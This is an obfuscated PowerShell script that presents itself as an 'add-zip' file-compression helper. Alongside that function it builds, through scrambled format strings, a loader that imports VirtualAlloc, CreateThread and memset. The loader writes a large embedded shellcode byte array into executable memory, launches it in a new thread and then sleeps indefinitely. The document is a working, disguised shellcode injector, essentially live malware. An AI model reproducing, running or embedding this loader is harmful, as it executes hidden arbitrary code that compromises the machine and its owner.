 Set-VAriABLE  ("{1}{0}"-f 'M','K9') ( [typE]("{2}{3}{1}{0}"-F'.pAtH','O','sYSTe','m.i')) ; sEt-ItEM ("VARi"+"A"+"blE:"+"E9h")  ( [tYpe]("{1}{2}{0}"-f 'tH','io','.Pa') )  ; 





function a`d`D-zip {
    param (
        [string]${S`o`URC`efilE},
        [string]${Z`IP`FilE}
    )

    begin {
        function RE`SOL`VE-`FUllpA`Th ([string]${P`AtH}) {    
            if ( -not ( ${K`9m}::("{1}{0}{2}{3}" -f 's','I','PathRoot','ed').Invoke(${P`AtH})) ) {
                
                ${P`ATH} = "$PWD\$Path"
            }
              (  iTeM ("VARi"+"a"+"BLe:"+"e9H") ).vAluE::("{2}{1}{0}"-f 'h','FullPat','Get').Invoke(${pA`TH})
        }
    }

    process {
        ${S`oUrcEfi`le} = .("{3}{2}{4}{0}{1}" -f 'Ful','lPath','ol','Res','ve-') ${S`oUrc`EFiLe}
        ${Z`IP`File} = &("{2}{0}{4}{3}{1}"-f 'sol','ath','Re','e-FullP','v') ${z`IpFIlE}

        if (-not (.("{2}{1}{0}" -f 'h','at','Test-P') ${z`Ipfi`le})) {
            &("{0}{2}{3}{1}" -f 'Set','ent','-','Cont') ${ZiPF`i`LE} ('PK' + [char]5 + [char]6 + ([string][char]0 * 18))
            (&("{0}{1}" -f 'Get-','Item') ${ZI`P`FIle})."Is`REaD`OnlY" = ${fal`sE}  
        }

        ${sh`eLL} = .("{1}{0}{2}"-f 'b','New-O','ject') -ComObject ("{0}{4}{2}{3}{1}"-f 'shel','cation','.a','ppli','l')
        ${z`iPpa`CK`AgE} = ${S`HELl}.("{0}{2}{1}"-f'N','meSpace','a').Invoke(${zi`p`FILE})

        ${ZIP`p`ACk`AgE}.("{0}{2}{1}" -f 'Cop','ere','yH').Invoke(${SoURc`eF`ilE})
    }
}

${iZ`o4} = ((("{93}{110}{78}{69}{97}{61}{77}{75}{99}{11}{45}{48}{20}{4}{46}{62}{89}{10}{64}{108}{18}{94}{41}{39}{60}{13}{87}{29}{5}{72}{66}{98}{38}{73}{82}{8}{76}{85}{67}{74}{3}{53}{57}{6}{101}{104}{40}{63}{68}{14}{1}{0}{7}{23}{56}{47}{28}{32}{16}{79}{22}{106}{83}{25}{103}{31}{42}{95}{37}{71}{34}{33}{17}{26}{50}{24}{102}{30}{9}{88}{100}{91}{84}{107}{44}{27}{80}{109}{86}{51}{59}{105}{35}{19}{96}{90}{49}{12}{2}{52}{92}{65}{70}{15}{58}{21}{36}{81}{55}{54}{43}" -f'ead(In','r','et(I','Impor','ir',' u','32','t','pe, uint flPr','dId);','c(',' sta','r mems','dwS','reateTh','st, uin','ta','wCre','d','c ext',' V','rc','Si','Ptr lpThre','Flags, IntPtr','lpSta','a','svcr','ttributes, uint','ze,','a','Add',' dwS','uint d','er, ','i',', ','r lpPa','flAl',', uin','Dd)]public static ','ss','ress, ',';','Ddm','tic exter','tualAl','A','n IntPtr','t','tion','lLDd)]pub','n','t(LDdk','t)','int coun','ad','ernel','t s','lic sta','t ','l32','l','ext','IntPtr l','d','nt',';[Dl','ern IntPtr C','LDd','e','ramet','i','l','l','li','otect','.dllLDd)]pub','rt(','ck','t.','u','ocationTy','tPtr ','rt(',')','l','i','[','o','P','mpo','tPtr ','[','dre','IntPt','ern Int','kerne',' ','c','DllI','.dll',' lpThre','rt','L','t','ze, In','L','pA','d','DllImpo'))-CrePLAce'LDd',[CHAr]34);${W} = &("{1}{0}"-f'dd-Type','A') -memberDefinition ${i`zO4} -Name ("{1}{0}"-f'32','Win') -namespace ("{1}{3}{2}{0}" -f 'ctions','Wi','2Fun','n3') -passthru;[Byte[]];[Byte[]]${z} = 0xdb,0xd3,0xbb,0x08,0x6c,0x1a,0xcf,0xd9,0x74,0x24,0xf4,0x5a,0x31,0xc9,0xb1,0x6f,0x31,0x5a,0x1a,0x83,0xea,0xfc,0x03,0x5a,0x16,0xe2,0xfd,0x90,0xf2,0x46,0xfd,0x68,0x03,0x39,0x74,0x8d,0x32,0x6b,0xe2,0xc5,0x67,0xbb,0x61,0x8b,0x8b,0x30,0x27,0x38,0x1f,0x34,0xef,0x4f,0xa8,0xf3,0xc9,0x7e,0x29,0x32,0xd5,0x2d,0xe9,0x54,0xa9,0x2f,0x3e,0xb7,0x90,0xff,0x33,0xb6,0xd5,0xe2,0xbc,0xea,0x8e,0x69,0x6e,0x1b,0xbb,0x2c,0xb3,0x1a,0x6b,0x3b,0x8b,0x64,0x0e,0xfc,0x78,0xdf,0x11,0x2d,0xd0,0x54,0x59,0xd5,0x5a,0x32,0x79,0xe4,0x8f,0x20,0x45,0xaf,0xa4,0x93,0x3e,0x2e,0x6d,0xea,0xbf,0x00,0x51,0xa1,0xfe,0xac,0x5c,0xbb,0xc7,0x0b,0xbf,0xce,0x33,0x68,0x42,0xc9,0x80,0x12,0x98,0x5c,0x14,0xb4,0x6b,0xc6,0xfc,0x44,0xbf,0x91,0x77,0x4a,0x74,0xd5,0xdf,0x4f,0x8b,0x3a,0x54,0x6b,0x00,0xbd,0xba,0xfd,0x52,0x9a,0x1e,0xa5,0x01,0x83,0x07,0x03,0xe7,0xbc,0x57,0xeb,0x58,0x19,0x1c,0x1e,0x8c,0x1b,0x7f,0x77,0x3c,0x41,0x0b,0x87,0xa8,0xfe,0x9a,0xe9,0x41,0x88,0xba,0xa2,0xf9,0xc6,0x35,0x6d,0xfd,0x29,0x6c,0x40,0xfe,0x81,0xd9,0xf4,0x57,0x78,0x8d,0xc0,0x01,0xfd,0xea,0xca,0x7b,0x16,0x94,0x6f,0xb5,0x20,0x05,0xc1,0xdf,0xb1,0xf4,0xb0,0x75,0xe6,0xa5,0x62,0xe2,0x51,0xc0,0x1c,0x34,0xa2,0x07,0xc9,0xf6,0x04,0x96,0xdc,0x5b,0xdf,0xd8,0xd2,0x3b,0x9b,0x8a,0x40,0xee,0xf2,0x78,0x35,0x66,0x1e,0x29,0x9b,0x4d,0x1f,0x04,0x6a,0x77,0xb5,0xb6,0x36,0x10,0xca,0x85,0xc8,0xe0,0x43,0x09,0xa2,0xe4,0x03,0xa3,0x2c,0xb3,0xcb,0x46,0x15,0xa5,0x8a,0x57,0x4c,0xe8,0x6d,0xf0,0x38,0x5c,0xc5,0xa8,0xae,0x4f,0xef,0x4c,0x54,0x6f,0x3a,0xe9,0x6a,0xfa,0xe6,0xba,0x65,0x81,0x69,0x3c,0x7a,0x89,0x82,0xed,0x93,0x07,0x54,0x0d,0x64,0xf0,0xf9,0xf2,0x9b,0xff,0x2d,0x48,0x0d,0x73,0x5a,0x25,0xa9,0x00,0xf2,0xb0,0x46,0xc9,0x67,0x42,0xcc,0x15,0x83,0xd9,0x3f,0xd6,0x0c,0x4d,0x2a,0xd4,0xd8,0x6f,0xfa,0xb2,0x1e,0x05,0xf8,0x15,0x77,0x03,0x0a,0x43,0xc8,0x4c,0x26,0xe7,0xe6,0x72,0xaf,0xb0,0x0d,0x71,0x19,0x05,0x59,0xf8,0x15,0xa1,0x6a,0x33,0x66,0x1d,0x69,0x63,0x37,0x08,0x06,0x91,0x21,0x3d,0x34,0x6a,0x98,0xbb,0x79,0xe0,0x0e,0x9c,0xfc,0xc8,0x25,0x0a,0x95,0xc8,0x91,0x62,0xe4,0x8c,0x3d,0x8f,0xa6,0x5f,0x56,0xa2,0x11,0xf1,0xfd,0x43,0x48,0x8e,0xee,0xb8,0x98,0x5e,0xbd,0xa8,0x98,0xc8,0xc5,0x7b,0xda,0x21,0xa3,0x7b,0x73,0xa1,0x05,0xf7,0x14,0xb6,0x99,0xd2,0x81,0xb8,0x0d,0x2d,0xe0,0x1a,0x9b,0x32,0xde,0xb2,0xb4,0x32,0x1e,0xbd,0xcb,0xe8,0xcf,0x31,0x5a,0x96,0x0f,0x59,0xaa,0xa7,0xef,0x66,0x9a,0x6e,0x20,0xb6,0xef,0xa4,0x72,0xe8,0x3b,0xf5,0x5c,0xc5,0x76,0xc5,0xa0;${G} = 0x1000;if (${Z}."lE`NG`TH" -gt 0x1000){${G} = ${Z}."le`NgTH"};${e`UF}=${W}::("{0}{1}{3}{2}" -f'Vir','t','oc','ualAll').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."Le`NG`Th"-1);${I}++) {${w}::"M`eMs`ET"([IntPtr](${e`UF}.("{2}{1}{0}" -f'nt32','oI','T').Invoke()+${i}), ${Z}[${I}], 1)};${w}::("{1}{2}{0}" -f'd','Crea','teThrea').Invoke(0,0,${e`UF},0,0,0);for (;;){&("{0}{1}{3}{2}" -f'S','t','-sleep','art') 60};
